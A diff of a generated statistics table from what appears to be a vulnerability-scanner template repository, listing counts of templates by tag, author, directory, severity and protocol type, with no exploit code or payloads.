-| cve2013 | 11 | z3bd | 3 | | | | | | | -| router | 11 | fyoorer | 3 | | | | | | | -| fuzz | 11 | impramodsargar | 3 | | | | | | | -| magento | 9 | _generic_human_ | 3 | | | | | | | -| xxe | 8 | f1tz | 3 | | | | | | | -| cnvd | 8 | shifacyclewala | 3 | | | | | | | -| aws | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| airflow | 8 | vsh00t | 3 | | | | | | | -| ftp | 8 | 0w4ys | 3 | | | | | | | -| rails | 8 | mavericknerd | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| login | 7 | yash anand @yashanand155 | 3 | | | | | | | -| nginx | 7 | amsda | 2 | | | | | | | -| vmware | 7 | fabaff | 2 | | | | | | | -| scada | 7 | udit_thakkur | 2 | | | | | | | -| cve2009 | 7 | lu4nx | 2 | | | | | | | -| backup | 6 | manas_harsh | 2 | | | | | | | -| solr | 6 | x1m_martijn | 2 | | | | | | | -| api | 6 | 0xprial | 2 | | | | | | | -| google | 6 | swissky | 2 | | | | | | | -| jetty | 6 | unstabl3 | 2 | | | | | | | -| cms | 6 | zomsop82 | 2 | | | | | | | -| dell | 6 | foulenzer | 2 | | | | | | | -| citrix | 6 | w4cky_ | 2 | | | | | | | -| coldfusion | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | 0xrudra | 2 | | | | | | | -| cve2010 | 6 | randomrobbie | 2 | | | | | | | -| laravel | 6 | 0xcrypto | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| netgear | 5 | bp0lr | 2 | | | | | | | -| files | 5 | moritz nentwig | 2 | | | | | | | -| iis | 5 | nkxxkn | 2 | | | | | | | -| java | 5 | davidmckennirey | 2 | | | | | | | -| fileupload | 5 | pxmme1337 | 2 | | | | | | | -| headless | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gal nagli | 2 | | | | | | | -| wp-theme | 5 | incogbyte | 2 | | | | | | | -| ssti | 5 | alifathi-h1 | 2 | | | | | | | -| ibm | 5 | lotusdll | 2 | | | | | | | -| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | -| django | 5 | hahwul | 2 | | | | | | | -| circarlife | 5 | afaq | 2 | | | | | | | -| drupal | 5 | sushantkamble | 2 | | | | | | | -| dedecms | 5 | random-robbie | 2 | | | | | | | -| crlf | 4 | bing0o | 2 | | | | | | | -| artifactory | 4 | bsysop | 2 | | | | | | | -| elastic | 4 | dheerajmadhukar | 2 | | | | | | | -| solarwinds | 4 | ree4pwn | 2 | | | | | | | -| zimbra | 4 | kiblyn11 | 2 | | | | | | | -| windows | 4 | joeldeleep | 2 | | | | | | | -| deserialization | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| asp | 4 | 0xsapra | 2 | | | | | | | -| vpn | 4 | gevakun | 2 | | | | | | | -| webserver | 4 | hetroublemakr | 2 | | | | | | | -| traversal | 4 | smaranchand | 1 | | | | | | | -| tomcat | 4 | johnjhacking | 1 | | | | | | | -| nodejs | 4 | alph4byt3 | 1 | | | | | | | -| magmi | 4 | bolli95 | 1 | | | | | | | -| hongdian | 4 | kurohost | 1 | | | | | | | -| jolokia | 4 | omarkurt | 1 | | | | | | | -| docker | 4 | streetofhackerr007 | 1 | | | | | | | -| samsung | 4 | fmunozs | 1 | | | | | | | -| thinkcmf | 4 | soyelmago | 1 | | | | | | | -| moodle | 4 | 0h1in9e | 1 | | | | | | | -| thinkphp | 4 | mhdsamx | 1 | | | | | | | -| tikiwiki | 3 | rojanrijal | 1 | | | | | | | -| microstrategy | 3 | c3l3si4n | 1 | | | | | | | -| httpd | 3 | rodnt | 1 | | | | | | | -| terramaster | 3 | revblock | 1 | | | | | | | -| kubernetes | 3 | juicypotato1 | 1 | | | | | | | -| kevinlab | 3 | shifacyclewla | 1 | | | | | | | -| symfony | 3 | shelld3v | 1 | | | | | | | -| git | 3 | jeya seelan | 1 | | | | | | | -| mongodb | 3 | cookiehanhoan | 1 | | | | | | | -| r-seenet | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | regala_ | 1 | | | | | | | -| ofbiz | 3 | luci | 1 | | | | | | | -| nacos | 3 | 0ut0fb4nd | 1 | | | | | | | -| printer | 3 | ipanda | 1 | | | | | | | -| itop | 3 | affix | 1 | | | | | | | -| opensis | 3 | bjhulst | 1 | | | | | | | -| hp | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| fanruan | 3 | sickwell | 1 | | | | | | | -| zabbix | 3 | _darrenmartyn | 1 | | | | | | | -| backups | 3 | tirtha_mandal | 1 | | | | | | | -| oa | 3 | ilovebinbash | 1 | | | | | | | -| log | 3 | schniggie | 1 | | | | | | | -| bitrix | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| targa | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | petruknisme | 1 | | | | | | | -| bypass | 3 | chron0x | 1 | | | | | | | -| amazon | 3 | sullo | 1 | | | | | | | -| ebs | 3 | micha3lb3n | 1 | | | | | | | -| wso2 | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| nosqli | 3 | notsoevilweasel | 1 | | | | | | | -| cve2008 | 3 | blckraven | 1 | | | | | | | -| resin | 3 | retr0 | 1 | | | | | | | -| grafana | 3 | pdp | 1 | | | | | | | -| fpd | 3 | luskabol | 1 | | | | | | | -| vbulletin | 3 | j33n1k4 | 1 | | | | | | | -| springcloud | 3 | thezakman | 1 | | | | | | | -| microsoft | 3 | b4uh0lz | 1 | | | | | | | -| openssh | 3 | noamrathaus | 1 | | | | | | | -| slack | 3 | absshax | 1 | | | | | | | -| ssh | 3 | d0rkerdevil | 1 | | | | | | | -| zhiyuan | 3 | alperenkesk | 1 | | | | | | | -| caucho | 3 | ratnadip gajbhiye | 1 | | | | | | | -| vrealize | 2 | 0xtavian | 1 | | | | | | | -| yapi | 2 | berkdusunur | 1 | | | | | | | -| prometheus | 2 | ahmed sherif | 1 | | | | | | | -| strapi | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | @dwisiswant0 | 1 | | | | | | | -| telerik | 2 | un-fmunozs | 1 | | | | | | | -| github | 2 | divya_mudgal | 1 | | | | | | | -| webcam | 2 | remonsec | 1 | | | | | | | -| cve2005 | 2 | 0xrod | 1 | | | | | | | -| idrac | 2 | _c0wb0y_ | 1 | | | | | | | -| ecology | 2 | furkansenan | 1 | | | | | | | -| kentico | 2 | mass0ma | 1 | | | | | | | -| igs | 2 | daviey | 1 | | | | | | | -| linkerd | 2 | aceseven (digisec360) | 1 | | | | | | | -| xxljob | 2 | mohammedsaneem | 1 | | | | | | | -| status | 2 | akash.c | 1 | | | | | | | -| hjtcloud | 2 | akshansh | 1 | | | | | | | -| kibana | 2 | andysvints | 1 | | | | | | | -| huawei | 2 | jteles | 1 | | | | | | | -| activemq | 2 | sy3omda | 1 | | | | | | | -| saltstack | 2 | kba@sogeti_esec | 1 | | | | | | | -| oauth | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ucmdb | 2 | nytr0gen | 1 | | | | | | | -| dolibarr | 2 | geraldino2 | 1 | | | | | | | -| frp | 2 | mubassirpatel | 1 | | | | | | | -| azure | 2 | raesene | 1 | | | | | | | -| spark | 2 | me9187 | 1 | | | | | | | -| leak | 2 | shreyapohekar | 1 | | | | | | | -| plesk | 2 | johnk3r | 1 | | | | | | | -| hpe | 2 | taielab | 1 | | | | | | | -| guacamole | 2 | patralos | 1 | | | | | | | -| odoo | 2 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| hasura | 2 | adrianmf | 1 | | | | | | | -| openam | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| couchdb | 2 | whynotke | 1 | | | | | | | -| showdoc | 2 | idealphase | 1 | | | | | | | -| wordfence | 2 | ajaysenr | 1 | | | | | | | -| sonicwall | 2 | gboddin | 1 | | | | | | | -| service | 2 | huowuzhao | 1 | | | | | | | -| chamilo | 2 | arcc | 1 | | | | | | | -| mail | 2 | pudsec | 1 | | | | | | | -| akamai | 2 | wabafet | 1 | | | | | | | -| emerge | 2 | ohlinge | 1 | | | | | | | -| sharepoint | 2 | yavolo | 1 | | | | | | | -| globalprotect | 2 | makyotox | 1 | | | | | | | -| jeedom | 2 | knassar702 | 1 | | | | | | | -| smtp | 2 | abison_binoy | 1 | | | | | | | -| grav | 2 | qlkwej | 1 | | | | | | | -| cve2007 | 2 | kabirsuda | 1 | | | | | | | -| jellyfin | 2 | undefl0w | 1 | | | | | | | -| shellshock | 2 | iampritam | 1 | | | | | | | -| waf | 2 | rtcms | 1 | | | | | | | -| rockethchat | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| nextjs | 2 | 52971 | 1 | | | | | | | -| cache | 2 | zhenwarx | 1 | | | | | | | -| fortios | 2 | sshell | 1 | | | | | | | -| icewarp | 2 | aresx | 1 | | | | | | | -| trixbox | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openfire | 2 | co0nan | 1 | | | | | | | -| flir | 2 | udyz | 1 | | | | | | | -| rockmongo | 2 | its0x08 | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| jboss | 2 | 0xteles | 1 | | | | | | | -| mida | 2 | zandros0 | 1 | | | | | | | -| hashicorp | 2 | defr0ggy | 1 | | | | | | | -| proxy | 2 | elmahdi | 1 | | | | | | | -| phpcollab | 2 | ldionmarcil | 1 | | | | | | | -| akkadian | 2 | philippdelteil | 1 | | | | | | | -| backdoor | 2 | becivells | 1 | | | | | | | -| glassfish | 2 | pratik khalane | 1 | | | | | | | -| paloalto | 2 | yashanand155 | 1 | | | | | | | -| dos | 2 | elder tao | 1 | | | | | | | -| keycloak | 2 | andirrahmani1 | 1 | | | | | | | -| maian | 2 | willd96 | 1 | | | | | | | -| horde | 2 | vzamanillo | 1 | | | | | | | -| jsf | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| seeyon | 2 | b0yd | 1 | | | | | | | -| natshell | 2 | tim_koopmans | 1 | | | | | | | -| intrusive | 2 | manuelbua | 1 | | | | | | | -| sonarqube | 2 | th3.d1p4k | 1 | | | | | | | -| pega | 2 | bad5ect0r | 1 | | | | | | | -| injection | 2 | mesaglio | 1 | | | | | | | -| nexus | 2 | alex | 1 | | | | | | | -| splunk | 2 | yashgoti | 1 | | | | | | | -| avantfax | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| chiyu | 2 | flag007 | 1 | | | | | | | -| rstudio | 2 | sicksec | 1 | | | | | | | -| bigip | 2 | ooooooo_q | 1 | | | | | | | -| nagios | 2 | exploitation | 1 | | | | | | | -| dompdf | 1 | fopina | 1 | | | | | | | -| hadoop | 1 | s1r1u5_ | 1 | | | | | | | -| openx | 1 | deena | 1 | | | | | | | -| spring | 1 | toufik airane | 1 | | | | | | | -| circontrol | 1 | hakluke | 1 | | | | | | | -| pyramid | 1 | _harleo | 1 | | | | | | | -| axis | 1 | ringo | 1 | | | | | | | -| pacsone | 1 | apt-mirror | 1 | | | | | | | -| javamelody | 1 | bernardofsr | 1 | | | | | | | -| acme | 1 | r3naissance | 1 | | | | | | | -| ssltls | 1 | dogasantos | 1 | | | | | | | -| xvr | 1 | thevillagehacker | 1 | | | | | | | -| discourse | 1 | dawid czarnecki | 1 | | | | | | | -| exposures | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| +| cve | 576 | pikpikcu | 234 | cves | 583 | info | 577 | http | 1696 | +| panel | 214 | dhiyaneshdk | 234 | vulnerabilities | 262 | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | +| exposure | 196 | dwisiswant0 | 127 | technologies | 158 | low | 156 | | | +| rce | 183 | geeknik | 127 | misconfiguration | 124 | | | | | +| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | +| wp-plugin | 133 | princechaddha | 53 | file | 46 | | | | | +| tech | 100 | gaurang | 42 | workflows | 34 | | | | | +| cve2021 | 92 | pussycat0x | 40 | network | 27 | | | | | +| config | 91 | ice3man | 26 | miscellaneous | 27 | | | | | +| cve2019 | 86 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 74 | 0x_akoko | 23 | dns | 11 | | | | | +| takeover | 73 | philippedelteil | 17 | cnvd | 9 | | | | | +| | 65 | sheikhrishad | 15 | fuzzing | 8 | | | | | +| apache | 64 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 54 | techbrunchfr | 13 | | | | | | | +| cve2017 | 47 | suman_kar | 12 | | | | | | | +| file | 46 | cyllective | 11 | | | | | | | +| iot | 44 | righettod | 10 | | | | | | | +| unauth | 42 | random_robbie | 10 | | | | | | | +| oob | 41 | r3dg33k | 9 | | | | | | | +| sqli | 35 | wdahlenb | 9 | | | | | | | +| network | 35 | hackergautam | 9 | | | | | | | +| ssrf | 30 | iamthefrogy | 8 | | | | | | | +| cve2016 | 30 | aashiq | 8 | | | | | | | +| workflow | 29 | that_juan_ | 8 | | | | | | | +| logs | 29 | nadino | 8 | | | | | | | +| oracle | 29 | melbadry9 | 8 | | | | | | | +| misc | 27 | kophjager007 | 7 | | | | | | | +| jira | 26 | techryptic (@tech) | 7 | | | | | | | +| atlassian | 26 | oppsec | 7 | | | | | | | +| redirect | 25 | randomstr1ng | 7 | | | | | | | +| listing | 24 | harshbothra_ | 7 | | | | | | | +| aem | 19 | emadshanab | 7 | | | | | | | +| cisco | 18 | dr_set | 7 | | | | | | | +| sap | 18 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 18 | caspergn | 6 | | | | | | | +| disclosure | 17 | puzzlepeaches | 6 | | | | | | | +| springboot | 15 | __fazal | 